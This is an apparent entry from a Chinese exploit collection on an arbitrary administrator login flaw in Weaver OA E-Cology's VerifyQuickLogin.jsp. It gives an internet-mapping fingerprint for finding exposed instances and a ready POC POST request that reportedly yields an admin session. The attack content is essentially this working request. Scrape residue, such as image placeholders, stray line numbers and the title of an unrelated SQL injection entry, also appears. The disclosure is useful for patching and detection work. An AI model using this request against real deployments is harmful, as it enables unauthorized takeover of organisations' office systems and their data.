PeiQi文库

# 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞

# 漏洞描述

泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击着通过发送特殊的请求包可以获取管理员Session

# 漏洞影响

泛微OA E-Cology

# 网络测绘

app="泛微-协同办公OA"

# 漏洞复现

产品主页

img

验证POC

POST /mobile/plugin/VerifyQuickLogin.jsp
  
identifier=1&language=1&ipaddress=x.x.x.x
1
2
3

img

泛微OA E-Cology WorkflowCenterTreeData SQL注入漏洞